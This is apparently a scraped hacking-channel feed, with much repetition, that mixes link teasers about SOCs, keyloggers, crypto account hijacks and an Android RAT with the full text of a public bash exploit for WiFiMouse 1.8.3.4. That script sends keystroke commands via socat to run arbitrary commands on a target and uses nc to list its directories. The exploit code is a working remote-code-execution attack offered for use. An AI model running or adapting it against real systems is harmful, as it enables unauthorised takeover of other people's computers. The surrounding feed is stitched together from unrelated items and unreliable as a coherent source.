Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WiFiMouse 1.8.3.4 Remote Code Execution
https://3.bp.blogspot.com/-bZ42fSZSr3k/WWlvHn9HijI/AAAAAAAAILg/Inc3JSbnqMk2Mr3Ts5OXFhitf0RPA2_cwCLcBGAs/s1600/h140.png
WiFiMouse version 1.8.3.4 suffers from a remote code execution vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WiFiMouse 1.8.3.4 Remote Code Execution
https://3.bp.blogspot.com/-bZ42fSZSr3k/WWlvHn9HijI/AAAAAAAAILg/Inc3JSbnqMk2Mr3Ts5OXFhitf0RPA2_cwCLcBGAs/s1600/h140.png
WiFiMouse version 1.8.3.4 suffers from a remote code execution vulnerability.
SHA-256 |
dcee2f3f5c3ab2a8df29abd14197cd5010f6cb612ffbe07e1a7870f3004c0108Download
# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10
#!/bin/bash
printf "
WiFiMouse / MouseServer 1.8.3.4 Exploit
by FEBIN
"
printf "[*] Enter the Target IP Address: "
read TARGET
rce(){
printf "[*] Enter the Command to execute on the Target: "
read CMD
sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}
dirlist(){
echo "[*] User's Home Directory Contents:"
echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-
while $true
do
printf "\nList Directory:> "
read DIR
echo "[+] Contents of $DIR: "
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
done
}
printf "
[1] Remote Command Execution
[2] Directory Listing
"
printf "Enter Your Choice (1 or 2) : "
read CHOICE
if [[ $CHOICE == "1" ]]
then
rce
elif [[ $CHOICE == "2" ]]
then
dirlist
else
echo "[-] Invalid Choice!"
fi
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WiFiMouse 1.8.3.4 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Unified Remote Authentication Bypass / Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Unified Remote Authentication Bypass / Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Unified Remote Authentication Bypass / Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
What is a Security Operations Center (SOC)
https://medium.com/@Offasapalvinx/what-is-a-security-operations-center-soc-9a8c4ba767b1?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@Offasapalvinx/what-is-a-security-operations-center-soc-9a8c4ba767b1?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is a Security Operations Center (SOC)
A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team…
A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team…Continue reading on Medium » (https://medium.com/@Offasapalvinx/what-is-a-security-operations-center-soc-9a8c4ba767b1?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is a Security Operations Center (SOC)
A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team…
Easy way to Install waybackurls on Kali Linux.
https://medium.com/@Offasapalvinx/easy-way-to-install-waybackurls-on-kali-linux-531d78f10874?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@Offasapalvinx/easy-way-to-install-waybackurls-on-kali-linux-531d78f10874?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Easy way to Install waybackurls on Kali Linux.
Fetch known URLs from the Wayback Machine for domains.
Fetch known URLs from the Wayback Machine for domains.Continue reading on Medium » (https://medium.com/@Offasapalvinx/easy-way-to-install-waybackurls-on-kali-linux-531d78f10874?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Easy way to Install waybackurls on Kali Linux.
Fetch known URLs from the Wayback Machine for domains.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
CoinDCX Twitter locked: Hacking verified accounts a new exploit for crypto scammers
https://cdn-images-1.medium.com/max/600/0*LPMFZxbELPZZr_4R
This is not the first time a verified crypto account has been hacked and used to promote fake projects and giveaways. A similar scheme was…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
CoinDCX Twitter locked: Hacking verified accounts a new exploit for crypto scammers
https://cdn-images-1.medium.com/max/600/0*LPMFZxbELPZZr_4R
This is not the first time a verified crypto account has been hacked and used to promote fake projects and giveaways. A similar scheme was…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
CoinDCX Twitter locked: Hacking verified accounts a new exploit for crypto scammers
This is not the first time a verified crypto account has been hacked and used to promote fake projects and giveaways. A similar scheme was…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Creating a Remotely Accessible Keylogger With Python
https://cdn-images-1.medium.com/max/1200/1*Ycj9ECuIyOo2gorWsOA3Bw.jpeg
A simple socket-based program
Continue reading on Better Programming »
___________________________
@hacking_Attack
@Hacking_Video
Creating a Remotely Accessible Keylogger With Python
https://cdn-images-1.medium.com/max/1200/1*Ycj9ECuIyOo2gorWsOA3Bw.jpeg
A simple socket-based program
Continue reading on Better Programming »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Creating a Remotely Accessible Keylogger With Python
A simple socket-based program
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
We’ve been hacked
https://cdn-images-1.medium.com/max/2600/0*G7tqA1xi4SaqetFK
Never thought it would happen to us
Continue reading on PCI+ »
___________________________
@hacking_Attack
@Hacking_Video
We’ve been hacked
https://cdn-images-1.medium.com/max/2600/0*G7tqA1xi4SaqetFK
Never thought it would happen to us
Continue reading on PCI+ »
___________________________
@hacking_Attack
@Hacking_Video
Medium
We’ve been hacked
Never thought it would happen to us
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What is a Security Operations Center (SOC)
https://cdn-images-1.medium.com/max/933/0*L86I7uxUVuceXe2I.png
A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is a Security Operations Center (SOC)
https://cdn-images-1.medium.com/max/933/0*L86I7uxUVuceXe2I.png
A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is a Security Operations Center (SOC)
A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team…
Hacking on Medium
Crypto News Daily Brief / 21.09.2022
https://cdn-images-1.medium.com/max/1538/1*m80f5AllLoUahrF2aVe1iA.png
Twitch makes a controversial announcement, Binance and FTX lead the Voyager auction, Wintermute is hacked for an impressive amount, and…
Continue reading on Ambros App »
___________________________
@hacking_Attack
@Hacking_Video
Crypto News Daily Brief / 21.09.2022
https://cdn-images-1.medium.com/max/1538/1*m80f5AllLoUahrF2aVe1iA.png
Twitch makes a controversial announcement, Binance and FTX lead the Voyager auction, Wintermute is hacked for an impressive amount, and…
Continue reading on Ambros App »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Crypto News Daily Brief / 21.09.2022
Twitch makes a controversial announcement, Binance and FTX lead the Voyager auction, Wintermute is hacked for an impressive amount, and…
Hacking on Medium
Attack Surface Management
https://cdn-images-1.medium.com/max/1920/0*elRj5QeJZ6fz03P4
Discover the attack surface and prioritize risk with our continuous Attack Surface Management platform.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Attack Surface Management
https://cdn-images-1.medium.com/max/1920/0*elRj5QeJZ6fz03P4
Discover the attack surface and prioritize risk with our continuous Attack Surface Management platform.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
AWS AMI (FREE TIER) VPS INSTALL
Discover the attack surface and prioritize risk with our continuous Attack Surface Management platform.
Rewards plus: Fake mobile banking rewards apps lure users to install info-stealing RAT on Android devices
https://www.reddit.com/r/redteamsec/comments/xkb5sx/rewards_plus_fake_mobile_banking_rewards_apps/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/FakeMobileRewards) [comments] (https://www.reddit.com/r/redteamsec/comments/xkb5sx/rewards_plus_fake_mobile_banking_rewards_apps/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/xkb5sx/rewards_plus_fake_mobile_banking_rewards_apps/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/FakeMobileRewards) [comments] (https://www.reddit.com/r/redteamsec/comments/xkb5sx/rewards_plus_fake_mobile_banking_rewards_apps/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Rewards plus: Fake mobile banking rewards apps lure users to...
Posted in r/redteamsec by u/SCI_Rusher • 1 point and 0 comments
f2q1 — error code — over-the-range microwave
https://medium.com/@BugFreeSoftOfficial/f2q1-error-code-over-the-range-microwave-2d47093cceb9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@BugFreeSoftOfficial/f2q1-error-code-over-the-range-microwave-2d47093cceb9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
f2q1 — error code — over-the-range microwave
If you’re encountering an f2q1 — error code — over-the-range microwave oven, don’t fret — we’ve got you covered on what this means and how…